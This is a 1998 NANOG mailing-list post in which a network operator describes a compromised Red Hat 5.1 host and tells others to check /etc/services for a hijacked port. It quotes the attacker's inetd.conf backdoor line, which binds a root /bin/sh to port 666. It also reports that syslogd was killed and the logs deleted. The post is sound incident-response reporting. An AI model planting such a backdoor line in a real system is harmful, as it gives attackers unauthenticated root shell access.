[21912] in North American Network Operators' Group
Re: IMAP attacks continue
daemon@ATHENA.MIT.EDU (Phil Howard)
Mon Nov 23 17:05:08 1998
From: Phil Howard <phil@whistler.intur.net>
To: nanog@merit.edu
Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
In-Reply-To: <199811231339.HAA02711@whistler.intur.net> from "Phil Howard" at Nov 23, 98 07:39:57 am
An addendum to:
> I found a machine that had Red Hat 5.1 unmodified running on it, and it
> got hit. So I closed things off and looked around for damage and found
> the following:
>
> 1. Syslogd had been killed off and the syslog file deleted.
>
> 2. A backdoor was installed in /etc/inetd.conf as follows:
>
> ttalk stream tcp nowait root /bin/sh sh -i
I checked the ports assignments from IANA and there is no such thing as
"ttalk". I found this line in /etc/services:
ttalk 666/tcp
so it appears to be hijacking the port used by (as seen in the file
ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):
mdqs 666/tcp
mdqs 666/udp
doom 666/tcp doom Id Software
doom 666/udp doom Id Software
So also check /etc/services on any potentially compromised machines.
--
-- *-----------------------------* Phil Howard KA9WGN * --
-- | Inturnet, Inc. | Director of Internet Services | --
-- | Business Internet Solutions | eng at intur.net | --
-- *-----------------------------* philh at intur.net * --
